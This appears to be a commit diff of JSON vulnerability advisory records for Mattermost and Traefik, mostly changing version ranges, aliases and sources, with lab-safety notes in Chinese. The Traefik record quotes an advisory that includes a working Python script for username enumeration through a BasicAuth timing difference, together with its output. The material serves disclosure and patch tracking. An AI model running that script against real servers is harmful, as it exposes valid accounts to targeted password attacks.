"8.0.0-20260115183946-38b413a27604",
"5.3.2-0.20260115183946-38b413a27604",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260115183946-38b413a27604",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"https://github.com/mattermost/mattermost/commit/38b413a27604e8721fbe008f8ec4b4e6c47ad4f0",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260115183946-38b413a27604",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260115183946-38b413a27604"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-26246--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260115183946-38b413a27604, introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260115183946-38b413a27604",
"introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260115183946-38b413a27604, introduced=0, fixed<5.3.2-0.20260115183946-38b413a27604, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260115183946-38b413a27604`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-26246--workflow"
}
}

172
08-threat-intel/registry/advisories/mattermost--CVE-2026-4265.json
查看文件

@@ -4,44 +4,64 @@
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "MMSA-2025-00553",
"summary": "(CWE-284) Fixed an issue where guest users could bypass team-specific upload_file permission restrictions by uploading files in teams where they had permission and then posting those files to channels in teams where they lacked the permission. Thanks to 0x7oda7123 for contributing to this improvement under the Mattermost responsible disclosure policy.",
"published_at": "2026-03-16",
"updated_at": "2026-03-16",
"severity": "medium",
"cvss_score": null,
"title": "Mattermost fails to validate team-specific upload_file permissions",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to validate team-specific upload_file permissions which allows a guest user to post files in channels where they lack upload_file permission via uploading files in a team where they have permission and reusing the file metadata in a POST request to a different team. Mattermost Advisory ID: MMSA-2025-00553",
"published_at": "2026-03-16T15:30:46Z",
"updated_at": "2026-03-23T18:56:04.837800Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://securityupdates.mattermost.com/security_updates.json",
"secondary_source_urls": [],
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-xpvf-6qcc-9jqc",
"https://github.com/mattermost/mattermost/commit/c7f6efdfb035490f494b3177996ee5f4b278c988",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"MMSA-2025-00553",
"CVE-2026-4265"
"CVE-2026-4265",
"GO-2026-4749",
"GHSA-xpvf-6qcc-9jqc"
],
"cve_ids": [
"CVE-2026-4265"
],
"ghsa_ids": [],
"osv_ids": [],
"ghsa_ids": [
"GHSA-xpvf-6qcc-9jqc"
],
"osv_ids": [
"GHSA-xpvf-6qcc-9jqc",
"GO-2026-4749"
],
"affected_versions": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"11.4.0",
"11.3.1",
"8.0.0-20260107144005-c7f6efdfb035",
"5.3.2-0.20260107144005-c7f6efdfb035",
"10.11.11",
"11.2.3",
"10.11.11"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "Mattermost Server",
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-4265.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"file-upload-validation"
"file-upload-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
@@ -54,8 +74,8 @@
"official": true
},
{
"entity_id": "mattermost--project--mattermost-server",
"entity_type": "project",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
@@ -63,71 +83,93 @@
],
"affected_components": [
{
"name": "Mattermost Server",
"entity_id": "mattermost--project--mattermost-server",
"scope": "package",
"package_name": "Mattermost Server",
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"11.4.0",
"11.3.1",
"8.0.0-20260107144005-c7f6efdfb035",
"5.3.2-0.20260107144005-c7f6efdfb035",
"10.11.11",
"11.2.3",
"10.11.11"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "10.11.x <= 10.11.10",
"patched_version": "11.4.0",
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260107144005-c7f6efdfb035",
"version_evidence_sources": [
"https://securityupdates.mattermost.com/security_updates.json"
"https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"https://github.com/advisories/GHSA-xpvf-6qcc-9jqc",
"https://github.com/mattermost/mattermost/commit/c7f6efdfb035490f494b3177996ee5f4b278c988",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--project--mattermost-server--11-3-x-11-3-0",
"mattermost--project--mattermost-server--11-2-x-11-2-2",
"mattermost--project--mattermost-server--10-11-x-10-11-10"
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--project--mattermost-server--11-4-0",
"mattermost--project--mattermost-server--11-3-1",
"mattermost--project--mattermost-server--11-2-3",
"mattermost--project--mattermost-server--10-11-11"
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260107144005-c7f6efdfb035",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--project--mattermost-server--11-4-0"
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107144005-c7f6efdfb035"
],
"version_sync_confidence": "high",
"advisory_scope": "package",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-4265--workflow",
"vuln_family": "xss",
"entry_surface": "web-ui-render-path",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `package`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035, introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"required_role": "unknown",
"affected_version_assertion": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `xss` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/editor",
"/preview",
"/rendered-content"
"/repo"
],
"input_shape": "\u53d7\u63a7 HTML/Markdown/\u5bcc\u6587\u672c\u8f93\u5165\uff0c\u89c2\u5bdf\u6e32\u67d3\u4e0a\u4e0b\u6587\u662f\u5426\u5931\u53bb\u7f16\u7801\u6216\u51c0\u5316\u3002",
"expected_unsafe_behavior": "\u8f93\u5165\u5728\u76ee\u6807\u4e0a\u4e0b\u6587\u6267\u884c\u6216\u88ab\u6d4f\u89c8\u5668\u89e3\u91ca\u4e3a\u4e3b\u52a8\u5185\u5bb9\u3002",
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
@@ -146,10 +188,10 @@
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `11.4.0`\u3002",
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035, introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260107144005-c7f6efdfb035`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `xss` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
@@ -175,14 +217,14 @@
"blocked_reason": null,
"metadata": {
"source_names": [
"Mattermost Security Updates JSON"
"OSV Mattermost"
],
"source_kinds": [
"json-feed"
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "package",
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-4265--workflow"
}

22
08-threat-intel/registry/advisories/traefik--CVE-2026-32305.json
查看文件

文件差异因一行或多行过长而隐藏

22
08-threat-intel/registry/advisories/traefik--CVE-2026-32595.json
查看文件

@@ -7,7 +7,7 @@
"title": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration",
"summary": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n name: basicauth\n namespace: traefik-poc\nspec:\n basicAuth:\n secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: test-basicauth\n annotations:\n traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n ingressClassName: traefik\n rules:\n - http:\n paths:\n - path: /protected\n pathType: Prefix\n backend:\n service:\n name: whoami\n port:\n number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n times = []\n for _ in range(SAMPLES):\n start = time.perf_counter()\n requests.get(TARGET, auth=(username, password), timeout=5)\n elapsed = time.perf_counter() - start\n times.append(elapsed)\n return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n median = measure_time(user)\n if median > 0.05: # bcrypt threshold\n status = \"[+] EXISTS (slow - bcrypt verification)\"\n else:\n status = \"[-] NOT FOUND (fast - immediate return)\"\n print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n - Attackers can enumerate valid usernames without authentication\n - Enables targeted password brute-force attacks against confirmed accounts\n - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n - BasicAuth middleware enabled\n - Attacker able to make requests to protected endpoints\n - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n</details>\n\n---",
"published_at": "2026-03-20T15:43:13Z",
"updated_at": "2026-03-20T15:46:26.940872Z",
"updated_at": "2026-03-23T18:56:05.020639Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
@@ -22,6 +22,7 @@
],
"aliases": [
"CVE-2026-32595",
"GO-2026-4792",
"GHSA-g3hg-j4jv-cwfr"
],
"cve_ids": [
@@ -31,13 +32,15 @@
"GHSA-g3hg-j4jv-cwfr"
],
"osv_ids": [
"GHSA-g3hg-j4jv-cwfr"
"GHSA-g3hg-j4jv-cwfr",
"GO-2026-4792"
],
"affected_versions": [
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
"fixed_versions": [
"2.11.41",
@@ -83,14 +86,15 @@
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
"fixed_version_ranges": [
"2.11.41",
"3.6.11",
"3.7.0-ea.2"
],
"introduced_version": "introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced_version": "introduced=0",
"patched_version": "2.11.41",
"version_evidence_sources": [
"https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr",
@@ -104,7 +108,8 @@
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-last-affected-1-7-34",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-fixed-2-11-41",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-fixed-3-6-11",
"traefik--repo--github-com-traefik-traefik-v3--introduced-3-7-0-ea-1-fixed-3-7-0-ea-2"
"traefik--repo--github-com-traefik-traefik-v3--introduced-3-7-0-ea-1-fixed-3-7-0-ea-2",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0"
],
"fixed_version_refs": [
"traefik--repo--github-com-traefik-traefik-v3--2-11-41",
@@ -133,7 +138,8 @@
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
